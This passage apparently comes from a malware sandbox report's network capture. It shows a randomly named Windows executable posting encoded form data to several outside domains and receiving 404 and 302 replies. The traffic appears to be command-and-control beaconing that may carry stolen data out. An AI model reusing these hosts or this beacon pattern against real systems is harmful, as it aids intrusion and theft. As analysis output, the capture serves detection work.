                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                35192.168.2.649747185.229.21.229801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:38.896657944 CEST1789OUTPOST /zzbw/ HTTP/1.1
                                Host: www.cuddle-paws.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.cuddle-paws.co.uk
                                Referer: http://www.cuddle-paws.co.uk/zzbw/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 66 61 59 66 2b 4a 77 69 77 31 7a 79 45 48 52 59 6c 59 4f 53 71 4c 2f 53 56 72 6f 72 6c 75 33 68 2b 42 70 77 5a 54 56 30 4a 6c 69 43 74 63 6d 53 47 50 58 52 45 4b 7a 30 4b 31 6e 33 65 65 6d 4e 52 63 7a 79 62 73 76 39 58 66 34 56 6b 38 7a 4f 75 6c 4a 4a 71 72 55 77 5a 55 59 4e 41 67 70 6d 64 56 4a 69 63 74 37 44 50 75 47 58 33 79 48 32 6e 36 47 42 6d 35 76 39 76 76 6f 4b 31 68 51 4b 39 74 76 4e 47 6e 71 57 58 69 69 59 75 39 4e 32 68 58 44 6a 62 6f 79 45 4d 2f 6f 75 54 43 2f 6b 4c 54 4e 34 43 6a 41 5a 79 32 79 72 7a 53 37 34 70 39 4a 4b 72 44 4a 39 34 55 79 39 6c 65 50 63 48 6e 47 35 4e 4b 67 74 4a 37 77 37 35 31 31 39 4d 39 61 35 76 56 37 30 77 56 2f 4d 6d 52 58 30 73 41 65 56 47 68 38 72 48 5a 56 65 38 6a 6f 33 52 6f 4f 6d 78 4d 59 5a 4f 77 43 39 50 6c 73 77 64 6d 5a 42 35 4f 4d 63 61 2f 35 4d 68 78 52 67 4e 4c 32 39 49 6d 72 73 38 48 44 4b 42 53 50 45 74 68 4b 37 41 50 62 70 6c 6f 54 57 31 66 34 36 66 47 53 54 48 37 77 74 71 4e 2b 39 51 6e 4a 6b 72 55 37 52 58 2b 54 57 73 63 6d 6a [TRUNCATED]
                                Data Ascii: jTZPp=faYf+Jwiw1zyEHRYlYOSqL/SVrorlu3h+BpwZTV0JliCtcmSGPXREKz0K1n3eemNRczybsv9Xf4Vk8zOulJJqrUwZUYNAgpmdVJict7DPuGX3yH2n6GBm5v9vvoK1hQK9tvNGnqWXiiYu9N2hXDjboyEM/ouTC/kLTN4CjAZy2yrzS74p9JKrDJ94Uy9lePcHnG5NKgtJ7w75119M9a5vV70wV/MmRX0sAeVGh8rHZVe8jo3RoOmxMYZOwC9PlswdmZB5OMca/5MhxRgNL29Imrs8HDKBSPEthK7APbploTW1f46fGSTH7wtqN+9QnJkrU7RX+TWscmjrYV6iZ2CVqAvWUZqqST6tTQ1asie1F3HLDoZVbNJSD5t684m2C34A4mAmxD1WIZ1XN1/JKui5uhUWT6b4tp+omMqjnQjl6ftwGvvE4D5M/9OMDNeInfNh2OWyIWw7QRrb0Jn7EosD+xhkKF2Yc4nyeqdQ6yQw6hpbZYjJZTBfmTjKII3IrK8MLUwyFBAnie+3qVm9G4Bc1dK47SQnTCMAAHCeoKDgch/zeyF5SqIA5AzkPktBGB3fwA1v5/O0Pk5e6tYIJP/hfd9RSu3wqOS2f3xSqNbylW5v3/A1IqwvxdqxDXQTG0XK5q2jLPyaZVZDwufZl5fufbVwAye8fhXu0Mhoybq5VvrJqcdkGHz8c6ULtwPSVZJlOXHYxqVWLlnD/c4CDqwMpe+KC22Y+3Mk+eZ/mIqUlogDF8Kl9KulAIrD171NJOjwj2UQ2oVGJNk4vat5HpSd/ac9JRHGNANqpkcCWsBsw7q6wtcZyWjDKEB5OnSTQhbQ+QGA1AddEU2QJ8L9oLV5boYjct/qlWmP2HMUS0Y2LyGgIo6vYP5kfEBHyrnWKSPVZmSSYcVMavcl5V6PKRg5LyjhP1rDqVlREPWb3wJJ/iktUzstnkHO6RPgXe2IQJxeqOfZjhViZ+kUsyhxsTTiZgv+Kb1loTVnxezuJLiFUgg9s [TRUNCATED]
                                May 28, 2024 07:17:39.512681961 CEST479INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:39 GMT
                                Server: Apache
                                Content-Length: 315
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                36192.168.2.649748185.229.21.229801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:41.438926935 CEST481OUTGET /zzbw/?5L0=2bCPy0&jTZPp=SYw/9+A27wDBBFVE9oOer+iKSaxo18ff/QICalIUdVK4tpmTGYvTJqWTGl/IZc6vUKz9bMfWLss6gerKkQ1b4agtfT85HThTdgJ4Gv37GO/tiVjy/t6jt5abgYoy/lcD8efQawI= HTTP/1.1
                                Host: www.cuddle-paws.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:17:42.069433928 CEST479INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:41 GMT
                                Server: Apache
                                Content-Length: 315
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                37192.168.2.649749178.63.50.103801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:47.272666931 CEST746OUTPOST /l7wc/ HTTP/1.1
                                Host: www.home-stroi0m.ru
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.home-stroi0m.ru
                                Referer: http://www.home-stroi0m.ru/l7wc/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 6d 45 63 41 55 63 64 57 49 72 44 5a 45 66 68 76 47 77 2f 67 74 52 41 78 77 5a 74 6e 49 37 45 76 35 41 4d 55 71 30 4a 78 49 52 4a 57 46 72 45 67 41 53 54 5a 72 55 48 6b 66 69 72 39 76 65 68 74 74 54 53 39 4e 64 51 33 71 30 74 43 6d 31 69 78 70 79 30 47 66 51 39 6d 34 68 65 30 34 47 72 78 4f 54 2f 45 4a 31 44 38 41 7a 51 6d 69 49 76 75 4b 6c 43 74 61 36 4d 45 51 4c 4a 51 4e 6d 4f 6f 32 65 41 7a 74 31 78 45 43 46 6c 58 48 45 44 59 45 33 30 2f 6a 4b 78 79 30 68 59 51 4f 41 31 6d 2b 42 46 6a 73 32 61 68 4c 35 6e 33 38 57 42 6c 37 72 6c 37 79 59 72 42 46 34 6d 66 35 62 2b 57 52 45 6d 4a 74 31 7a 68 49 76 2f 37
                                Data Ascii: jTZPp=mEcAUcdWIrDZEfhvGw/gtRAxwZtnI7Ev5AMUq0JxIRJWFrEgASTZrUHkfir9vehttTS9NdQ3q0tCm1ixpy0GfQ9m4he04GrxOT/EJ1D8AzQmiIvuKlCta6MEQLJQNmOo2eAzt1xECFlXHEDYE30/jKxy0hYQOA1m+BFjs2ahL5n38WBl7rl7yYrBF4mf5b+WREmJt1zhIv/7
                                May 28, 2024 07:17:47.939431906 CEST221INHTTP/1.1 302 Found
                                Date: Tue, 28 May 2024 05:17:47 GMT
                                Content-Length: 0
                                Connection: close
                                cache-control: no-store
                                location: http://home-stroi0m.ru/l7wc/
                                x-powered-by: flexbe.com
                                x-flexbe: gs1 [default] in 1 ms


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                38192.168.2.649750178.63.50.103801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:49.818346977 CEST770OUTPOST /l7wc/ HTTP/1.1
                                Host: www.home-stroi0m.ru
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.home-stroi0m.ru
                                Referer: http://www.home-stroi0m.ru/l7wc/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 6d 45 63 41 55 63 64 57 49 72 44 5a 45 37 64 76 45 58 44 67 71 78 41 79 73 4a 74 6e 52 72 45 30 35 41 41 55 71 78 70 62 4a 69 74 57 46 4b 30 67 42 54 54 5a 6f 55 48 6b 58 43 72 34 79 75 67 41 74 54 65 50 4e 66 45 33 71 79 42 43 6d 30 53 78 71 46 5a 51 63 67 39 7a 74 78 65 32 6c 57 72 78 4f 54 2f 45 4a 30 6d 58 41 7a 49 6d 69 34 2f 75 49 41 2b 75 57 61 4d 44 58 4c 4a 51 61 32 50 41 32 65 41 52 74 30 39 75 43 47 64 58 48 45 54 59 46 69 41 38 71 4b 78 77 71 52 5a 38 43 56 45 44 35 7a 52 6e 73 33 54 4e 66 71 72 6e 39 67 41 2f 6e 59 6c 59 67 49 4c 44 46 36 2b 74 35 37 2b 38 54 45 65 4a 2f 69 2f 47 48 62 61 59 50 4d 55 41 31 56 6d 77 32 65 2f 76 58 44 34 41 44 61 65 67 48 67 3d 3d
                                Data Ascii: jTZPp=mEcAUcdWIrDZE7dvEXDgqxAysJtnRrE05AAUqxpbJitWFK0gBTTZoUHkXCr4yugAtTePNfE3qyBCm0SxqFZQcg9ztxe2lWrxOT/EJ0mXAzImi4/uIA+uWaMDXLJQa2PA2eARt09uCGdXHETYFiA8qKxwqRZ8CVED5zRns3TNfqrn9gA/nYlYgILDF6+t57+8TEeJ/i/GHbaYPMUA1Vmw2e/vXD4ADaegHg==
                                May 28, 2024 07:17:50.460824013 CEST221INHTTP/1.1 302 Found
                                Date: Tue, 28 May 2024 05:17:50 GMT
                                Content-Length: 0
                                Connection: close
                                cache-control: no-store
                                location: http://home-stroi0m.ru/l7wc/
                                x-powered-by: flexbe.com
                                x-flexbe: gs1 [default] in 1 ms


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                39192.168.2.649751178.63.50.103801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:53.125232935 CEST1783OUTPOST /l7wc/ HTTP/1.1
                                Host: www.home-stroi0m.ru
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.home-stroi0m.ru
                                Referer: http://www.home-stroi0m.ru/l7wc/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 6d 45 63 41 55 63 64 57 49 72 44 5a 45 37 64 76 45 58 44 67 71 78 41 79 73 4a 74 6e 52 72 45 30 35 41 41 55 71 78 70 62 4a 69 6c 57 46 59 73 67 48 30 2f 5a 70 55 48 6b 5a 69 72 35 79 75 67 34 74 51 76 47 4e 66 49 42 71 78 31 43 6b 53 47 78 69 51 74 51 48 51 39 7a 79 42 65 7a 34 47 72 6b 4f 56 66 41 4a 31 57 58 41 7a 49 6d 69 37 58 75 65 46 43 75 51 61 4d 45 51 4c 4a 55 4e 6d 50 37 32 61 73 72 74 30 34 62 44 33 39 58 45 6c 6a 59 49 30 63 38 6c 4b 78 49 72 52 5a 6b 43 56 41 51 35 7a 63 63 73 32 57 51 66 6f 33 6e 39 57 4a 33 31 59 78 47 38 62 6a 56 53 5a 65 62 32 73 65 44 54 58 69 68 77 78 6e 52 46 6f 72 78 58 59 4d 38 68 54 37 41 39 75 48 68 59 57 46 4a 58 34 54 45 57 57 66 53 69 45 4b 65 77 36 56 41 38 73 71 53 4a 53 2f 49 38 65 54 44 58 4f 4b 79 76 41 41 31 4a 4c 34 59 4d 32 74 30 49 43 73 72 6a 50 4f 4b 7a 64 7a 54 75 4b 67 6f 49 55 77 6b 66 56 34 55 55 4d 76 71 66 6c 51 54 6a 48 46 39 62 6a 51 41 49 38 69 31 79 31 43 66 4f 6e 73 71 6b 66 41 58 79 36 64 53 4f 5a 76 61 44 4a 65 68 [TRUNCATED]
                                Data Ascii: jTZPp=mEcAUcdWIrDZE7dvEXDgqxAysJtnRrE05AAUqxpbJilWFYsgH0/ZpUHkZir5yug4tQvGNfIBqx1CkSGxiQtQHQ9zyBez4GrkOVfAJ1WXAzImi7XueFCuQaMEQLJUNmP72asrt04bD39XEljYI0c8lKxIrRZkCVAQ5zccs2WQfo3n9WJ31YxG8bjVSZeb2seDTXihwxnRForxXYM8hT7A9uHhYWFJX4TEWWfSiEKew6VA8sqSJS/I8eTDXOKyvAA1JL4YM2t0ICsrjPOKzdzTuKgoIUwkfV4UUMvqflQTjHF9bjQAI8i1y1CfOnsqkfAXy6dSOZvaDJeh0ilwR+yhr34bMGXyETx30+0gUgm3Pi55MwfeFnYW7UyLiXEgv4EXnGEF/pV07UroWsBadfNqcJTqvimI/pOAXPynyylcTiOS1At7/qzHC0PjhWu81VmejpVlrA7Y0QDlMbhc6YhfM4yyFDhn0Kst4WWHYmKSPgprl1Ng5GZ9Q5FhRwIDl1TqbIBv7+9TV7JctYEdLgH1LA2g+20EAhluwdme9vGrjdYyHL2Abu27ri/uLZ/Wnu5WAUfg084fw2iNau5e3m1yDG2sL5D0xWqLYF6Xpq4jyfsAQ0lXn87oZSqvQF+mcMZfaYY6bpr1qyeWFQBhRZbRjDDJXKi63U70h0tR02rz7ccnkMsVsZSy3zuNdgm9ji04AZ0T1GN68eWSLQ7XUYQNtpFFyPxMQEQFFT6UqO1swMsykQYJQVdfb26N2uEwOxAZJrEVKBtBmtn/e1BqdgBpsP9T6sjdH6k/v1Y8qENGiwL+KQyp4YeczJxyoVAAY3Ex+Zy1PIicCYDNEGVexHCXoG5iVPW3qJTDkYLIh+sER2zeih8MG0E3SDFcL5QzF7dFcUoMT1VAo5AKP+5EwVIPVlJPEAcAWsBcCHEWS7z91F+05Dbwp9fdqbjroSyQBEe9vq2Z8lE6B4CopfYOUCi3AdSeCCKugUHne8cvaLZjZ4zydf [TRUNCATED]
                                May 28, 2024 07:17:53.773762941 CEST221INHTTP/1.1 302 Found
                                Date: Tue, 28 May 2024 05:17:53 GMT
                                Content-Length: 0
                                Connection: close
                                cache-control: no-store
                                location: http://home-stroi0m.ru/l7wc/
                                x-powered-by: flexbe.com
                                x-flexbe: gs1 [default] in 1 ms


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                40192.168.2.649752178.63.50.103801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:55.662132025 CEST479OUTGET /l7wc/?jTZPp=rG0gXsVcMKnwL95DCAGLkXtixogTaqlVvgNhyV5MOQBbV9UvRUrQqDi5YjTtkNY5nkWwRtE2kxMBrn6VhlI+Nig16EK01wjkMFHIaUG8fjlX1oi4FBapVJcXf+AOShDHzPE0tCU=&5L0=2bCPy0 HTTP/1.1
                                Host: www.home-stroi0m.ru
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:17:56.331805944 CEST381INHTTP/1.1 302 Found
                                Date: Tue, 28 May 2024 05:17:56 GMT
                                Content-Length: 0
                                Connection: close
                                cache-control: no-store
                                location: http://home-stroi0m.ru/l7wc/?jTZPp=rG0gXsVcMKnwL95DCAGLkXtixogTaqlVvgNhyV5MOQBbV9UvRUrQqDi5YjTtkNY5nkWwRtE2kxMBrn6VhlI%20Nig16EK01wjkMFHIaUG8fjlX1oi4FBapVJcXf%20AOShDHzPE0tCU%3D&5L0=2bCPy0
                                x-powered-by: flexbe.com
                                x-flexbe: gs1 [default] in 1 ms


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                41192.168.2.649753108.179.192.228801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:18:01.720040083 CEST743OUTPOST /qy3g/ HTTP/1.1
                                Host: www.betopfloor.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.betopfloor.com
                                Referer: http://www.betopfloor.com/qy3g/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 32 6f 58 6d 34 67 51 68 73 6f 6f 6c 6d 4e 66 43 44 34 49 76 74 77 64 75 42 74 67 6c 6f 61 75 35 4b 2b 7a 4d 66 41 64 34 54 32 64 32 6c 51 6f 70 41 2f 41 6c 33 37 4f 49 6d 57 6f 4b 36 6f 2f 54 72 53 57 30 7a 30 74 59 44 50 41 4c 54 57 6d 43 56 51 6e 78 42 59 35 66 77 31 6a 67 52 4e 68 62 37 32 77 45 6f 54 72 6f 74 44 41 79 58 49 4b 33 53 65 33 78 41 42 77 4b 75 41 59 6c 4a 70 6e 71 54 46 6c 34 44 43 69 77 72 72 4f 50 75 36 6b 4f 39 49 76 4a 79 42 6d 72 7a 37 62 75 69 4f 36 2f 68 4d 54 66 35 79 31 61 57 61 58 57 4c 43 6d 65 62 35 72 49 57 57 43 73 2b 59 38 49 79 64 6f 41 48 74 70 7a 58 4d 72 6c 74 75 63 52
                                Data Ascii: jTZPp=2oXm4gQhsoolmNfCD4IvtwduBtgloau5K+zMfAd4T2d2lQopA/Al37OImWoK6o/TrSW0z0tYDPALTWmCVQnxBY5fw1jgRNhb72wEoTrotDAyXIK3Se3xABwKuAYlJpnqTFl4DCiwrrOPu6kO9IvJyBmrz7buiO6/hMTf5y1aWaXWLCmeb5rIWWCs+Y8IydoAHtpzXMrltucR
                                May 28, 2024 07:18:02.251393080 CEST1236INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:18:02 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Thu, 15 Sep 2022 09:59:43 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Content-Length: 4677
                                Content-Type: text/html
                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 [TRUNCATED]
                                Data Ascii: RmssgJ&av$NmRmHInM=_cpw~y3(\G(z}[832qQtjEl0;hQoAqK/^zPP`1PP%J^Vyg::<s}k9=v]Ivs8w>;]Np3xyvGe)e,v&FVIJqM3Hhp8(a{8jotEI.6q^>YZQH]rBis_4:Jar!c(j):{{d!5Dh4+k5yUD$wZ}YQO,5I>i6<]2XpCMe^Wh2.|~l'|v,sTWdG'8RFOE>8.V?\~[KJzp=4LB)YyuFMYb;Cd5[&TWRd{/_lyoY'+G;G\?zJL9*~"P,EO$}(OW<2X!SSQrxOx"#DJMAP!3-uH26?<gR;1<]9G$Vp0sBQ=f%afQmB<qMZq0&VkI&;A}
                                May 28, 2024 07:18:02.251408100 CEST1236INData Raw: 2a 6d a5 44 33 d4 a4 71 b1 99 49 63 79 2b 21 45 66 c8 7d ce 7e f9 e5 e0 60 b1 69 91 ef a6 ab dd a3 c9 f3 17 2f 7e 5d ec ba 42 9a b5 cd c3 17 bf 26 87 2f 56 43 53 84 7b 98 88 e4 2e 37 54 eb b4 bf 38 87 cf fd bf 11 0b 31 29 f2 c2 cf d5 1c 2c 29 99
                                Data Ascii: *mD3qIcy+!Ef}~`i/~]B&/VCS{.7T81),)V*RCx{k_hT!dnD3bxixqTHr2=-c/7UtoGc-'9_e$'(e66FANz=86CG]__^g^v/o
                                May 28, 2024 07:18:02.251418114 CEST1236INData Raw: d3 16 aa a5 c0 11 77 9c 06 70 2d f3 c2 71 9d 65 72 e7 67 b7 4d f9 97 a6 78 33 93 82 c8 22 5c 19 aa d0 38 89 76 00 b7 8c 58 2d df 59 8d 52 e0 90 bf bc 76 3f ae 12 5e 1f 5f 0e 51 fa 28 da aa 25 42 fb 6a 70 ac 19 d5 3a 7d 50 88 5b 5f d5 a9 30 1e 75
                                Data Ascii: wp-qergMx3"\8vX-YRv?^_Q(%Bjp:}P[_0uBTg0+|~@('H{3jsrTMsMDk={j-o|m4aG+.<W6CYkGm^jTRm=9tMj=;74O
